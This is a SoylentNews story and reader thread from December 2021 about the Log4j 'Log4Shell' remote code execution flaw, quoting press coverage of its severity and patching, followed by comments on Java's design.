SoylentNews is people
SoylentNews
from the is-that-what-'write-once,-run-anywhere'-means? dept.
'The Internet is on Fire'
The problem lies in Log4j, a ubiquitous, open source Apache logging framework that developers use to keep a record of activity within an application. Security responders are scrambling to patch the bug, which can be easily exploited to take control of vulnerable systems remotely. At the same time, hackers are actively scanning the internet for affected systems. Some have already developed tools that automatically attempt to exploit the bug, as well as worms that can spread independently from one vulnerable system to another under the right conditions.
Log4j is a Java library, and while the programming language is less popular with consumers these days, it's still in very broad use in enterprise systems and web apps. Researchers told WIRED on Friday that they expect many mainstream services will be affected.
For example, Microsoft-owned Minecraft on Friday posted detailed instructions for how players of the game's Java version should patch their systems. "This exploit affects many services—including Minecraft Java Edition," the post reads. "This vulnerability poses a potential risk of your computer being compromised." Cloudflare CEO Matthew Prince tweeted Friday that the issue was "so bad" that the internet infrastructure company would try to roll out a least some protection even for customers on its free tier of service.
All an attacker has to do to exploit the flaw is strategically send a malicious code string that eventually gets logged by Log4j version 2.0 or higher. The exploit lets an attacker load arbitrary Java code on a server, allowing them to take control.
"It's a design failure of catastrophic proportions," says Free Wortley, CEO of the open source data security platform LunaSec. Researchers at the company published a warning and initial assessment of the Log4j vulnerability on Thursday.
'The Internet's on Fire': Techs Race to Fix Major Cybersecurity Software Flaw
'The internet's on fire': Techs race to fix major cybersecurity software flaw:
Amit Yoran, CEO of the cybersecurity firm Tenable, called it "the single biggest, most critical vulnerability of the last decade" — and possibly the biggest in the history of modern computing.
The vulnerability, dubbed 'Log4Shell,' was rated 10 on a scale of one to 10 the Apache Software Foundation, which oversees development of the software.Anyone with the exploit can obtain full access to an unpatched computer that uses the software. Experts said the extreme ease with which the vulnerability lets an attacker access a web server — no password required — is what makes it so dangerous.
New Zealand's computer emergency response team was among the first to report that the flaw was being "actively exploited in the wild" just hours after it was publicly reported Thursday and a patch released.
The vulnerability, located in open-source Apache software used to run websites and other web services, was reported to the foundation on November 24 by the Chinese tech giant Alibaba, it said. It took two weeks to develop and release a fix. But patching systems around the world could be a complicated task.
May I have a cup of water?
(Score: 1, Funny) by Anonymous Coward on Saturday December 11 2021, @03:03PM (6 children)
Yeah maybe the NSA funded this.
Often even that coder in Nebraska wouldn't add nor approve such moronic "features", much less enable them by default.
(Score: 2, Insightful) by Anonymous Coward on Saturday December 11 2021, @03:58PM (5 children)
At some point, sane people say "enough already - fix your existing shit."
(Score: 5, Insightful) by VLM on Saturday December 11 2021, @06:13PM (3 children)
The fundamental problem with Java enterprise bloatware is nobody never had the balls to say no to anything. So you get string interpolated, URL look up logging libraries returning executable functions instead of logging stuff like cruder more simplistic non-enterprise grade software.
Civilized secure languages tell the programmer to STFU and print to a console or write to a file or shove lines of text in what amounts to one UDP packet to port 514 on some server far away and be happy because when I was a kid I debugged by walking uphill both ways in the snow and sure it took me three days of debugging to get some obscure PIC microcontroller to blink a LED instead of crashing on boot, but fuck those enterprise developers my blinking LED never got powned by those wiley Russian Hackers still trying to steal the 2016 election despite it being 2021.9998.
Minecraft never wouldda gotten powned if it was written in a civilized language like TCL/TK but no they had to Java it all up till they inevitably got powned.
(Score: 3, Touché) by fishybell on Sunday December 12 2021, @12:21AM
Ah yes, Tcl, where all executable functions are just strings, and all strings are executable. Definitely a civilized.
(Score: 0) by Anonymous Coward on Monday December 13 2021, @01:53PM (1 child)
Java before 1.4 was kind of like the Go language in that it had an intentionally extremely limited set of features. That made the code simple and readable, but it also meant that there were a bazillion libraries for common features and the world started using XML to represent data structures because it was less verbose ( 😱 ) than Java.
Now Java has regular expressions, generics, annotations (arguably a limited form of multiple inheritance), interfaces with default function implementations (arguably another limited form of multiple inheritance), lambdas, multi line strings, and limited variable type inference. Any program you could write in 100k lines of Java 1.3 could probably be written in less than 20k lines of Java 17. And Java 17 is still bloated compared to Python, Kotlin, Scala, Lisp, and a number of other expressive languages.
(Score: 0) by Anonymous Coward on Wednesday December 15 2021, @10:21AM
Go just got generics, actually.
(Score: 0) by Anonymous Coward on Tuesday December 14 2021, @02:34AM
Funny you say that, but in recent years they've removed corba, webstart & applets and bunch of other things including xml processing,etc. and try to focus it down to key capabilities and shed legacy stuff. Maybe you're still stuck in the 90s version of Java where it kept adding stuff..
The past rarely stays where it is - people commenting based on their experience at a point in time in the past really need to rethink how they communicate.